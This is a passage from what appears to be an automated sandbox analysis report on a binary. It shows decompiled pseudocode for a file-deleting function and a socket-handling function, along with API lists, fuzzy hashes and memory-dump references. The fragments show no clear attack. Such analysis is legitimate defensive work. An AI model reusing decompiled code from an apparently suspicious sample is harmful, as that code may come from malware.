				return E24013088( &_v8);
			}











                                    0x240379f4
                                    0x240379fd
                                    0x24037a00
                                    0x24037a03
                                    0x24037a05
                                    0x24037a0b
                                    0x24037a12
                                    0x24037a13
                                    0x24037a18
                                    0x24037a1b
                                    0x24037a2a
                                    0x24037a33
                                    0x24037a3f
                                    0x24037a47
                                    0x24037a4c
                                    0x24037a5b
                                    0x24037a60
                                    0x24037a63
                                    0x24037a6f
                                    0x24037a7c
                                    0x24037a86
                                    0x24037a8e
                                    0x24037a95
                                    0x24037a98
                                    0x24037a9b
                                    0x24037aa8
                                    0x24037ab5

                                    APIs
                                    • GetTickCount.KERNEL32 ref: 24037A4F
                                    • DeleteFileA.KERNEL32(00000000,.bmp,?,00000000,00000000,?,00000000,00000000,00000000,24037AB6), ref: 24037A7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CountDeleteFileTick
                                    • String ID: .bmp
                                    • API String ID: 3334397753-2863430793
                                    • Opcode ID: 5d09838b5dbda2db6b969e4b842fdf0a801727d071de7219e69a17ac339c6e74
                                    • Instruction ID: 56ef9ec1f8a93c828d2b14400da44eff182bebcb0fa92d9dc652f763471fc924
                                    • Opcode Fuzzy Hash: 5d09838b5dbda2db6b969e4b842fdf0a801727d071de7219e69a17ac339c6e74
                                    • Instruction Fuzzy Hash: EA115170900508AFFF01DFA4DC91A9EBBB8FF58304F5084B9E418B7658DB74AF858A54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24022BF4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51networkCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 69%
                                    			E24022BF4(void* __eax, void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t4;
				intOrPtr _t10;
				intOrPtr* _t23;

				_push(__ecx);
				_t22 = __ecx;
				_t21 = __edx;
				_t14 = __eax;
				if(__ecx != 0xffffffff) {
					_push(0);
					_push(__ecx);
					_push(__edx);
					_t4 =  *((intOrPtr*)(__eax + 0x14));
					_push(_t4);
					L240225B0();
					 *_t23 = _t4;
					__eflags =  *_t23;
					if(__eflags == 0) {
						_t4 = E24022A38(__eax, __eax, 0x24022c94, __edx, __ecx, __eflags);
					}
					__eflags =  *_t23 - 0xffffffff;
					if( *_t23 == 0xffffffff) {
						L240225E8();
						 *_t23 = _t4;
						__eflags =  *_t23 - 0x2733;
						if(__eflags != 0) {
							E24022A38(_t14, _t14, 0x24022ca0, _t21, _t22, __eflags);
						} else {
							 *_t23 = 0;
						}
					}
				} else {
					_push(_t23);
					_push(0x4004667f);
					_t10 =  *((intOrPtr*)(__eax + 0x14));
					_push(_t10);
					L240225A0();
					_t25 = _t10 + 1;
					if(_t10 + 1 == 0) {
						 *_t23 = 0xffffffff;
						E24022A38(__eax, __eax, 0x24022c88, __edx, __ecx, _t25);
					}
				}
				return  *_t23;
			}









                                    0x24022bf7
                                    0x24022bf8
                                    0x24022bfa
                                    0x24022bfc
                                    0x24022c01
                                    0x24022c2a
                                    0x24022c2c
                                    0x24022c2d
                                    0x24022c2e
                                    0x24022c31
                                    0x24022c32
                                    0x24022c37
                                    0x24022c3a
                                    0x24022c3e
                                    0x24022c47
                                    0x24022c47
                                    0x24022c4c
                                    0x24022c50
                                    0x24022c52
                                    0x24022c57
                                    0x24022c5a
                                    0x24022c61
                                    0x24022c71
                                    0x24022c63
                                    0x24022c65
                                    0x24022c65
                                    0x24022c61
                                    0x24022c03
                                    0x24022c03
                                    0x24022c04
                                    0x24022c09
                                    0x24022c0c
                                    0x24022c0d
                                    0x24022c12
                                    0x24022c13
                                    0x24022c15
                                    0x24022c23
                                    0x24022c23
                                    0x24022c13
                                    0x24022c7d

                                    APIs
                                    • ioctlsocket.WS2_32(?,4004667F), ref: 24022C0D
                                      • Part of subcall function 24022A38: shutdown.WS2_32(?,00000002), ref: 24022A83
                                      • Part of subcall function 24022A38: closesocket.WS2_32(?), ref: 24022AB1
                                    • WSAGetLastError.WS2_32(?,00000000,?,00000000,?,?,00000000,?,24022CBD,?,?,2403964C,00000000,2403A33B), ref: 24022C52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastclosesocketioctlsocketshutdown
                                    • String ID: 3'
                                    • API String ID: 3350378930-280543908
                                    • Opcode ID: f5dc1c39abd40040a28d975040232451fe452102047e3e871c7c58a91caabf28
                                    • Instruction ID: 7482472f57dfd568b38b7b43ba680b7aca5b129539512fee90b592815c00cef7
                                    • Opcode Fuzzy Hash: f5dc1c39abd40040a28d975040232451fe452102047e3e871c7c58a91caabf28
                                    • Instruction Fuzzy Hash: ED0175742189109BD310FEF89C8495BA6D8AB5D374F714A7CA1D09F2D5D634C8C18752
                                    Uniqueness

                                    Uniqueness Score: -1.00%